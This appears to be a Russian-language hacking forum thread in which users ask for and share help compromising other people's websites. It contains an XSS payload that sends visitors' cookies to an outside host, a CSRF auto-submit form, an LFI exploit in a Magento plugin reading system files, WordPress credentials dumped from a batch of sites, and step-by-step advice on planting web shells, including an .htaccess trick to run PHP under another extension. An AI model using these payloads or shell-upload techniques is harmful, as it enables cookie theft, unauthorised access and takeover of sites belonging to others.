[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. xobbitua

    xobbitua New Member

    Joined:
    3 Oct 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Как проверить сразу несколько URL на редирект?

    Подскажите плиз шаровые или трайал сервисы, чтобы проверить сразу 63 линка на редирект? Нижеуказанный умеет расшифровывать Ютубовские скриптовые коды вида youtube.com/channel/UCAXxzBq3dfQ+V3FN501aMlw, а большинство бесплатных - нет Sad

    Если надо проверить редирект отдельных страниц: на сайте сервисов http://try.seoimage.com/check-server-header-check-redirects-tool/ - можно попробовать, но взломать форму я не смог :(
     
    #521 xobbitua, 19 Nov 2014
    Last edited: 19 Nov 2014
  2. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    под какие версии phpmyadmin есть брутфорс программы?
     
  3. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Где в БД Drupal найти адрес сайта?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    https://rdot.org/forum/showthread.php?t=1990
     
    _________________________
  5. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы

    "><script>img = new Image(); img.src = \"http://site.ru4_1.gif?\"+document.cookie;</script> как их закодировать? пробовал base не катит
     
    #525 Kolyan333, 18 Jan 2015
    Last edited: 18 Jan 2015
  6. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    140
    Likes Received:
    6
    Reputations:
    0
    Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано здесь, 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!
     
  7. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    229
    Likes Received:
    58
    Reputations:
    5
    в личку доступ.
     
  8. StiXy24

    StiXy24 Member

    Joined:
    18 Dec 2009
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Нашел уязвимость.
    Вытащил из пачки сайтов примерно вот такие данные:
    1. <?php// ** MySQL settings - You can get this info from your web host ** //define('DB_NAME', '*******');define('DB_USER', '*******');define('DB_PASSWORD', '*******');define('DB_HOST', 'localhost');define('DB_CHARSET', 'utf8');define('DB_COLLATE', '');define('AUTH_KEY', '*******');define('SECURE_AUTH_KEY','*******');define('LOGGED_IN_KEY','*******');define('NONCE_KEY','*******q');define('AUTH_SALT','*******');define('SECURE_AUTH_SALT', '*******');define('LOGGED_IN_SALT', '*******');define('NONCE_SALT', '*******');$table_prefix= 'wp_';define ('WPLANG', 'el');define('WP_DEBUG', false);if ( !defined('ABSPATH') )define('ABSPATH', dirname(__FILE__) . '/');require_once(ABSPATH . 'wp-settings.php');
    Как залить шелл на сервак?
     
  9. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне
     
  10. StiXy24

    StiXy24 Member

    Joined:
    18 Dec 2009
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    забыл уточнить, все сайты на wordpress
     
  11. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    229
    Likes Received:
    58
    Reputations:
    5
    Ну попробуй зайти в myadmin сделай юзера, залей шелл и вауля.
    Если myadmin нету, то попробуй через внешнее подключение приконнектится, хотя маловероятно, но пытка не пытка)
     
  12. sernaid

    sernaid New Member

    Joined:
    24 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Доброго дня!
    Есть уязвимость LFI в Magento plugin Magmi.

    http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility файл mage читается.
    http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility
    файл passwd читается.

    http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility
    а вот так с расширением php либо любым другим не читается.
    Как прочесть?
     
  13. Forserer

    Forserer New Member

    Joined:
    16 Aug 2015
    Messages:
    58
    Likes Received:
    2
    Reputations:
    0
    Какую информацию можно посмотреть по уязвимостям Stress Web желательно версии 13
     
  14. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    ситуация такая
    есть csfr


    <form method='post' action='/anketa.php?'>
    <div class="end">Личные данные:</div>
    Имя:<br />
    <input type='text' name='ank_name' value='shramDCMSHELP' maxlength='32' /><br />
    Фамилия:<br />
    <input type='text' name='familiya' value='1' maxlength='64' /><br />
    Дата рождения:<br />
    <input type='text' name='ank_d_r' value='1' size='2' maxlength='2' />
    <input type='text' name='ank_m_r' value='1' size='2' maxlength='2' />
    <input type='text' name='ank_g_r' value='1' size='4' maxlength='4' /><br />
    <input type='submit' name='save' value='Сохранить' />
    </form>



    и как здесь включить <html><body onload="document.forms['NAME'].submit();"> если нету name в post запросе у меня в html коде
     
  15. ujanin

    ujanin New Member

    Joined:
    17 Nov 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А как найти phpmyadmin если везде написано localhost? мб есть, где почитать на эту тему?
     
  16. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Сканерами директорий искать. В разделе софт ArxScanSite например.
     
    ujanin likes this.
  17. gQd

    gQd New Member

    Joined:
    13 Jan 2013
    Messages:
    98
    Likes Received:
    0
    Reputations:
    0
    есть доступ к админке DLE 10, какие актуальные способы существуют залитие шелла?
     
  18. ujanin

    ujanin New Member

    Joined:
    17 Nov 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?
     
  19. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    .htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.
     
  20. ujanin

    ujanin New Member

    Joined:
    17 Nov 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает

    с таким содержимым htaccess

    AddType application/x-httpd-php .bit
    AddHandler application/x-httpd-php .bit